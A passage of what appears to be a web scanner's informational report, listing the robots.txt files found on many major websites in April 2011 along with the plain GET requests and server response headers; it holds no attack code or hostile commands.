Content-Type: text/plain;charset=utf-8
Date: Sat, 02 Apr 2011 14:16:19 GMT
Content-Length: 172
Connection: close

User-agent: *
Disallow: /assets/
Disallow: /i/
Disallow: /live/
Disallow: /results/
Disallow: /syndication/
Allow: /
Sitemap: http://www.nbcnewyork.com/sitemap.xml
24.579. http://www.ncm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ncm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ncm.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 25 Mar 2011 13:00:38 GMT
Accept-Ranges: bytes
ETag: "09f1da3eceacb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:35:56 GMT
Connection: close
Content-Length: 369

User-Agent: *
Disallow: /CSS
Disallow: /Fathom
Disallow: /Info
Disallow: /Images
Disallow: /Movies/Ticketing_Bounce.aspx
Disallow: /Movies/Photo_Slideshow.aspx
Disallow: /Celebrities/Photo_Slid
...[SNIP]...
24.580. http://www.netflix.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netflix.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netflix.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:47 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 24 Mar 2011 13:33:18 GMT
Content-Type: text/plain
Content-Length: 1449
Vary: Accept-Encoding
Cache-Control: private
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Set-Cookie: NSC_ED2-xxx=ffffffff09cc3e6845525d5f4f58455e445a4a422d69;path=/;domain=netflix.com;httponly

# /robots.txt file for www.netflix.com/
# Mod NDH 5/23/2003

User-agent: *
Disallow: /Address
Disallow: /AddToQueue
Disallow: /BeMyFriend
Disallow: /BillingHistory
Disallow: /BillingActivity
Disallow:
...[SNIP]...
24.581. http://www.netquote.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netquote.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netquote.com

Response

HTTP/1.1 200 OK
Content-Length: 510
Content-Type: text/plain
Content-Location: http://www.netquote.com/flatcontent/netquote/robots.txt
Last-Modified: Tue, 23 Dec 2008 21:30:21 GMT
Accept-Ranges: bytes
ETag: "809472a84565c91:898"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:37 GMT
Connection: close

User-agent: *

Disallow: /newsletter/subscribe-confirmation.aspx
Disallow: /nq/progressive_motorcycle.aspx
Disallow: /Timeout.aspx
Disallow: /Errors/
Disallow: /health-insurance.aspx
Disallow:
...[SNIP]...
24.582. http://www.netsuite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netsuite.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 195
Content-Disposition: inline;filename*=utf-8''robots.txt
NS_RTIMER_COMPOSITE: 669476043:73686F702D6A6176613030332E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=1993
Date: Sat, 02 Apr 2011 13:39:19 GMT
Connection: close

User-Agent: *
Disallow: /portal/pdf/tos.pdf

Crawl-Delay: 10
User-Agent: *
Disallow: /portal/resource/terms_of_service.shtml

User-Agent: *
Disallow: /portal/resource/terms-of-service.shtml
24.583. http://www.newegg.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newegg.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newegg.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 18 Mar 2010 02:17:25 GMT
ETag: "1830812641c6ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
x-server-id: 121
X-UA-Compatible: IE=7
Content-Length: 789
Date: Sat, 02 Apr 2011 13:40:39 GMT
Age: 0
Connection: keep-alive
X-Served-By: E401
X-Ver: 11030801
X-Cache: MISS
X-Cache-Hits: 0
Set-Cookie: NSC_xxx.ofxfhh.dpn-WJQ=ffffffffaf18326045525d5f4f58455e445a4a4229a1;expires=Sat, 02-Apr-2011 14:35:28 GMT;path=/

User-agent: *

Disallow: /App/
Disallow: /Application/
Disallow: /Common/
Disallow: /Configuration/
Disallow: /Scripts/
Disallow: /Test.aspx
Disallow: /GiftCertificate/GiftCartPlus.aspx
Disal
...[SNIP]...
24.584. http://www.newgrounds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newgrounds.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newgrounds.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:24 GMT
Server: Apache/2.2.17 (Unix)
Last-Modified: Fri, 19 Nov 2010 20:37:38 GMT
ETag: "6b234f-148-4956de08aa880"
Accept-Ranges: bytes
Content-Length: 328
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /dump/
Disallow: /cgi-bin/
Disallow: /bbs/post.php
Disallow: /bbs/takepost.php
Disallow: /pm/
Disallow: /moderators/
Disallow: /bbs/moderators/
Disallow: /ajax/
Disallow: /js/

...[SNIP]...
24.585. http://www.newport-news.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newport-news.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newport-news.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 10 Dec 2010 16:33:12 GMT
ETag: "d46deeef8798cb1:1373"
Content-Length: 512
Date: Sat, 02 Apr 2011 13:56:03 GMT
Connection: close

User-agent: *
Disallow: /15off
Disallow: /aspnet_client
Disallow: /bin
Disallow: /club
Disallow: /clubgold
Disallow: /common
Disallow: /config
Disallow: /controls
Disallow: /controlsMobile
D
...[SNIP]...
24.586. http://www.newsbucket.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsbucket.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newsbucket.co.uk

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:03 GMT
Server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.14 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Mon, 01 Nov 2010 22:38:17 GMT
ETag: "14648167-1a-4940576e04840"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 13:58:03 GMT
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

24.587. http://www.newser.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newser.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newser.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Expires: Sun, 29 Mar 2020 00:00:00 GMT
Last-Modified: Thu, 08 Jul 2010 22:17:24 GMT
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 14:03:49 GMT
Connection: close
Content-Length: 449

# Newser: robots.txt
#
# This file is used to allow crawlers to crawl our site.
#
User-agent: *
Disallow: /controlpage.aspx
Disallow: /getimage.aspx
Disallow: /getresizedimage.aspx
Disallo
...[SNIP]...
24.588. http://www.newsinc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsinc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newsinc.com

Response

HTTP/1.1 200 OK
Content-Length: 122
Content-Type: text/plain
Last-Modified: Thu, 22 Jan 2009 06:38:16 GMT
Accept-Ranges: bytes
ETag: "7074ad15c7cc91:f72"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
S: 1.www.newsinc.com
Date: Sat, 02 Apr 2011 14:14:48 GMT
Connection: close

# robots.txt generated at http://www.mcanerin.com
User-agent: *
Disallow:
Disallow: /cgi-bin/
Disallow: /freewheel/
24.589. http://www.newsmax.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newsmax.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 07 Dec 2010 16:54:34 GMT
Accept-Ranges: bytes
ETag: "4799126d2f96cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 02 Apr 2011 13:31:44 GMT
Connection: close
Content-Length: 278

User-agent: *
Disallow: /*.axd
Disallow: /*.axd$
Disallow: /ScriptResource.axd$
Disallow: /ScriptResource.axd*
Disallow: /WebResource.axd$
Disallow: /WebResource.axd*
Disallow: /bin/
sitemap:
...[SNIP]...
24.590. http://www.newsok.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsok.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newsok.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 13 Aug 2010 18:59:02 GMT
ETag: "1bd078-150-48db91378e980"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Connection: close
Date: Sat, 02 Apr 2011 12:52:35 GMT
Age: 213
Content-Length: 336

User-Agent: *
Disallow: /xml
Disallow: /photo/
Disallow: /load/
Disallow: /news9/
Disallow: /movies/
Disallow: /my/
Disallow: /apps/
Disallow: /article/keyword/
Disallow: /cj/
Disallow: /cox/
Disallow
...[SNIP]...
24.591. http://www.newsvine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=cb25ff935b866007940a37e6786f7dc4; expires=Fri, 28-Mar-2031 13:44:28 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 13:44:28 GMT
Content-Length: 227
Keep-Alive: timeout=3, max=997
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://www.ne
...[SNIP]...
24.592. http://www.newsweek.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsweek.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newsweek.com

Response

HTTP/1.1 200 OK
Age: 58
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:26:37 GMT
ETag: "1b80788-24-4875a639ecac0"
Last-Modified: Mon, 24 May 2010 17:29:55 GMT
Server: Apache
Vary: Accept-Encoding
Via: 1.1 varnish
X-Cacheable: YES
X-Varnish: 2022418699 2022417254
Content-Length: 36
Connection: Close

User-agent: *
Disallow: /search.html
24.593. http://www.nextel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nextel.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:42:27 GMT
Content-length: 148
Content-type: text/plain
Last-modified: Sat, 14 Mar 2009 10:44:53 GMT
Accept-ranges: bytes
Connection: close

#
# robots.txt for
#
# Dynamic Apps
User-agent: *
Disallow: /NASApp/registration
Disallow: /wps/
User-agent: nol-Ultraseek
Disallow: /wps/

24.594. http://www.nextinsure.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextinsure.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nextinsure.com

Response

HTTP/1.1 200 OK
Content-Length: 696
Content-Type: text/plain
Last-Modified: Wed, 19 Dec 2007 19:12:47 GMT
Accept-Ranges: bytes
ETag: "80a1d6237342c81:1a62"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:40:00 GMT
Connection: close

User-agent: *
Crawl-delay: 10
#Directories
Disallow: /common/
Disallow: /bin/
Disallow: /geolocation/
Disallow: /js/
Disallow: /images/
Disallow: /images/accounts/
Disallow: /js/
Disallow: /
...[SNIP]...
24.595. http://www.nfl.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nfl.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nfl.com

Response

HTTP/1.0 200 OK
ETag: W/"451-1301521068000"
Last-Modified: Wed, 30 Mar 2011 21:37:48 GMT
Content-Type: text/plain
Cache-Control: max-age=55
Expires: Sat, 02 Apr 2011 13:25:54 GMT
Date: Sat, 02 Apr 2011 13:24:59 GMT
Content-Length: 451
Connection: close

# robots.txt for http://www.nfl.com/

User-agent: *
Disallow: /test/ # these are test pages that should not get indexed
Disallow: /widgets/ # there is no reason to index our widgets. They should
...[SNIP]...
24.596. http://www.nhl.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nhl.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nhl.com

Response

HTTP/1.0 200 OK
ETag: "400fa75-227-49f99e5ea68c0"
Server: Apache
Last-Modified: Tue, 29 Mar 2011 07:20:43 GMT
Cteonnt-Length: 551
Content-Type: text/plain; charset=utf-8
Cache-Control: private, max-age=60
Date: Sat, 02 Apr 2011 14:19:24 GMT
Content-Length: 551
Connection: close

Sitemap: http://www.nhl.com/sitemap-news.xml
Sitemap: http://www.nhl.com/sitemap-video-index.xml
Sitemap: http://www.nhl.com/sitemap-adhoc.xml
Sitemap: http://www.nhl.com/sitemap-draft.xml
Sitemap: ht
...[SNIP]...
24.597. http://www.nickjr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nickjr.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nickjr.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Length: 118
Content-Type: text/plain
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:20 GMT; path=/
ETag: W/"118-1301149306000"
Vary: User-Agent
Cache-Control: max-age=1200
Date: Sat, 02 Apr 2011 13:31:20 GMT
Connection: close

User-agent: *
Disallow: /test/
Disallow: /ads/
Disallow: /static/
sitemap: http://www.nickjr.com/sitemap_index.jsp
24.598. http://www.nih.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nih.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nih.gov

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 02 Apr 2011 13:23:39 GMT
Content-type: text/plain
Last-modified: Fri, 14 Jan 2011 22:55:27 GMT
Content-length: 1392
Etag: "570-4d30d45f"
Accept-ranges: bytes
Connection: close

User-agent: PicoSearch/1.0
Disallow: /news/information/knight/
Disallow: /nidcd/
Disallow: /od/ors/od/oqm/bestpractices/
Disallow: /od/ors/oam/policy/
Disallow: /od/ors/dss/eurest/
Disallow: /o
...[SNIP]...
24.599. http://www.nike.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nike.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nike.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Nov 2010 21:54:30 GMT
ETag: "12b-4956ef37bca26"
Content-Type: text/plain
Cache-Control: max-age=1185
Expires: Sat, 02 Apr 2011 14:04:24 GMT
Date: Sat, 02 Apr 2011 13:44:39 GMT
Content-Length: 299
Connection: close

# *.nike.com robots.txt -- just crawl it.
User-agent: *
Allow: /
Disallow: /nikegolf/global/
Disallow: /nikegolf/en_US/
Disallow: /nikegolf/en_CA/
Disallow: /nikegolf/en_EU/
Disallow: /nikegolf/ko_KR/
...[SNIP]...
24.600. http://www.nintendo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nintendo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nintendo.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:01 GMT
Server: Apache
Set-Cookie: NINTENDO=173.193.214.243.1301753941037135; path=/; expires=Thu, 31-Mar-16 14:19:01 GMT; domain=.nintendo.com
Last-Modified: Tue, 12 Oct 2010 15:13:31 GMT
ETag: "2f8f1-2e-4926ceb70bcc0"
Accept-Ranges: bytes
Content-Length: 46
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONo OTPa OUR SAMa NOR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE OTC", policyref="http://www.nintendo.com/w3c/p3p.xml"
NODE: swebe2
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerWEB_NINTENDO=2052065290.20480.0000; path=/

User-agent: *
Disallow: /consumer/newsletters
24.601. http://www.nola.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nola.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nola.com

Response

HTTP/1.0 200 OK
Server: Apache
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 13:37:08 GMT
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:37:07 GMT
Content-Length: 447
Connection: close
Set-Cookie: Apache=69.2.101.254.1301751427713009; path=/; expires=Sun, 01-Apr-12 13:37:07 GMT

# Robots.txt for http://www.nola.com/
# Last updated 03/01/2011

Sitemap: http://blog.nola.com/www-sitemapindex.xml

User-agent: *
Disallow: /auctions/
Disallow: /cgi-bin/
Disallow: /printer/
Disallo
...[SNIP]...
24.602. http://www.northerntool.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.northerntool.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.northerntool.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: CP='NOI DSP COR NID OTPi OUR NOR'
Last-Modified: Thu, 10 Feb 2011 14:50:48 GMT
ETag: "c0ee6-290-b4ff6200"
Accept-Ranges: bytes
Content-Length: 656
Content-Type: text/plain; charset=windows-1252
Date: Sat, 02 Apr 2011 13:44:46 GMT
Connection: close
Set-Cookie: stop_mobi=yes; path=/; domain=northerntool.com

# Denies search engine access to disallowed url's

User-agent: *
Disallow: /ab_testcontent/
Disallow: /ebay/
Disallow: /Html_no_corem/
Disallow: /library/
Disallow: /merchandising/
Disallow: /
...[SNIP]...
24.603. http://www.notebookreview.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.notebookreview.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.notebookreview.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 30 Mar 2010 19:05:00 GMT
Accept-Ranges: bytes
ETag: "0162ce53bd0ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:05:45 GMT
Connection: close
Content-Length: 218

Sitemap: /sitemap.xml
User-Agent: *
Disallow: /mobile/
Disallow: /printArticle.asp
Disallow: /emailArticle.asp
Disallow: /deals/tellFriend.asp
Disallow: /scripts/
Disallow: /shared/
Allow: /sh
...[SNIP]...
24.604. http://www.npr.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.npr.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.npr.org

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 21 Jul 2004 21:14:03 GMT
ETag: "ee-3dfc0e1ac1cc0"
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Thu, 31 Mar 2011 18:08:20 GMT
Keep-Alive: timeout=10, max=4992
Content-Type: text/plain
Connection: close
Date: Sat, 02 Apr 2011 13:43:59 GMT
Age: 265
Content-Length: 238

User-agent: *
Disallow: /cgi-bin
Disallow: /ramfiles/
Disallow: /*.smil
Disallow: /*.asx
Disallow: /*.ram
Disallow: /*.rmm
Disallow: /*.js
Disallow: /*.au
Disallow: /stations/force/force_localization.
...[SNIP]...
24.605. http://www.nps.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nps.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nps.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:29 GMT
Content-Length: 61
Content-Type: text/plain
ETag: "1b0000002fd15d-3d-49fe1fba7f40a"
Last-Modified: Fri, 01 Apr 2011 21:20:45 GMT
Accept-Ranges: bytes
Server: Apache
Connection: close

User-agent: *
Disallow: /loader.cfm
Disallow: /*loader.cfm*
24.606. http://www.nwsource.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nwsource.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nwsource.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 30 Dec 2008 20:07:55 GMT
ETag: "14810-6b8-259adcc0"
Accept-Ranges: bytes
Content-Length: 1720
Content-Type: text/plain; charset=UTF-8
Expires: Sat, 02 Apr 2011 13:34:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:34:03 GMT
Connection: close

# $Id: robots.txt,v 1.7.2.1 2007/03/23 18:57:07 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...
24.607. http://www.nydailynews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nydailynews.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:38 GMT
Server: Apache
Last-Modified: Wed, 16 Mar 2011 16:13:58 GMT
Accept-Ranges: bytes
Content-Length: 1440
Keep-Alive: timeout=3, max=1000
Content-Type: text/plain
Content-Language: en
Age: 0
Via: AX-CACHE-2.4:20
Set-Cookie: sto-id-sg-web-8080=BOACAKAK; Expires=Sat, 02-Apr-2011 02:23:20 GMT; Path=/

sitemap: http://www.nydailynews.com/sitemap/data/sitemap.xml

User-agent: *
Disallow: /nydn/form/webSearch.jsp
Disallow: /nydn/form/register.jsp
Disallow: /nydn/form/login.jsp
Disallow: /nydn/em
...[SNIP]...
24.608. http://www.nypost.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nypost.com

Response

HTTP/1.0 200 OK
Content-Length: 378
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=431
Date: Sat, 02 Apr 2011 13:39:00 GMT
Connection: close

# Robots.txt
# The New York Post Online Edition

User-Agent: MetaCartaRSSFeedReader
Disallow:
Disallow: /cgi-bin/
Disallow: /shared-content/

User-agent: *
Disallow: /seven
Disallow: /admin
...[SNIP]...
24.609. http://www.nytimes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 12:43:14 GMT
Content-length: 637
Content-type: text/plain
Set-cookie: RMID=0a35de834e6f4d9719e2caff; expires=Sunday, 01-Apr-2012 12:43:14 GMT; path=/; domain=.nytimes.com
Last-modified: Mon, 26 Apr 2010 17:28:40 GMT
Accept-ranges: bytes
Connection: keep-alive

User-agent: *
Allow: /ads/public/
Disallow: /ads/
Disallow: /adx/bin/
Disallow: /aponline/
Disallow: /archives/
Disallow: /auth/
Disallow: /cnet/
Disallow: /college/
Disallow: /external/
Disallow: /fi
...[SNIP]...
24.610. http://www.ocregister.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ocregister.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ocregister.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:46 GMT
Server: Apache
Cache-Control: max-age=86400
Last-Modified: Sat, 02 Apr 2011 09:46:21 GMT
Expires: Sun, 03 Apr 2011 09:46:21 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 1046
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /common/bc/
Disallow: /common/bc3/
Disallow: /common/gabriels/
Disallow: /common/gsa/
Disallow: /common/printer/
Disallow: /common/pluck/
Disallow: /common/tools/
Disallow: /co
...[SNIP]...
24.611. http://www.octonet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.octonet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.octonet.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Date: Sat, 02 Apr 2011 14:17:09 GMT
Connection: close
Content-Length: 97

User-agent: ia_archiver
Disallow: /

User-agent: *
Disallow: /~sys~/
Disallow: /%7esys%7e/
24.612. http://www.officedepot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officedepot.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.officedepot.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 10 Nov 2010 05:03:55 GMT
ETag: "292-c8bd24c0"
P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:39:10 GMT
Content-Length: 658
Connection: close
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com

# Robots.txt file for http://www.officedepot.com
#

User-agent: *
Disallow: /account/
Disallow: /ads/
Disallow: /b2b/
Disallow: /billboard/
Disallow: /cart/
Disallow: /catalogrequest/
Disallow: /check
...[SNIP]...
24.613. http://www.officemax.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officemax.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.officemax.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 04 Feb 2011 20:00:30 GMT
ETag: "5ed-49b7a5585f380"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:19:30 GMT
Content-Length: 1517
Connection: close

#Updated - 01/20/11

User-agent: *

Sitemap: http://www.officemax.com/sitemap.xml


Disallow: *&csId*
Disallow: *.swf
Disallow: */promotions.jsp?cat*
Disallow: *?sp=true
Disallow: *?view=li
...[SNIP]...
24.614. http://www.olivegarden.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.olivegarden.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.olivegarden.com

Response

